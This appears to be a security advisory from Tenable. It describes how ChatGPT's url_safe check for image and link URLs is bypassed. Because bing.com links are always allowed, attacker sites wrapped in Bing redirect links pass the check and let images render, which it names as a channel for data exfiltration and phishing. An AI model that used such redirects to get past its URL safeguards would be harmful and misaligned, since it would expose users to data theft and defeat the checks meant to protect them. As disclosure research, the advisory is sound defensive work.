Tenable Researchers discovered a method by which the url_safe defense mechanism can be bypassed. An attacker could exploit this bypass to affect the loading of malicious resources used for phishing or a variety of other purposes. At the time this advisory was published, this issue remains unresolved.
ChatGPT aims to protect its users by verifying URLs and checking for potentially malicious content. This mechanism is called url_safe. In case of a reference to a URL through an image markdown or a hyperlink, ChatGPT verifies that this website is trustworthy and reliable. Only if that’s the case - it then processes it and acts. This functionality protects the engine and users from uncontrolled/unsafe URLs. However, we managed to bypass this core defense mechanism and access any website we wanted, regardless of its maliciousness.
Bypassing the url_safe defense mechanism
Rendering images is usually the best technique for exfiltrating data. We noticed OpenAI tried to block rendering images from unsafe URLs with the url_safe defense mechanism, but we managed to bypass it.
The url_safe function runs when it recognizes a URL in the chat, either through image markdown, hyperlink or other types of links in the chat. It simply sends the URL to ChatGPT’s backend, and returns if the URL is safe or not.
We noticed that URLs from bing.com are always allowed, and we managed to abuse it by using our indexed sites on Bing. Indexed sites on Bing are served through a wrapped link that redirects the user from a bing.com link to the user’s websites - essentially an open redirect as a service.
With our bing.com links, we could bypass the url_safe defense mechanism, which then returned true and our image markdowns rendered successfully.
Additional Research
Tenable would like to acknowledge similar url_safe bypass research published during the disclosure window: https://embracethered.com/blog/posts/2025/spaiware-and-chatgpt-command-and-control-via-prompt-injection-zombai/
Tenable researchers became aware of this publication, and the referenced talk which was delivered at Blackhat Europe 2024, after the initial report of the discovery had been made to OpenAI, but prior to the public disclosure of the associated discovery.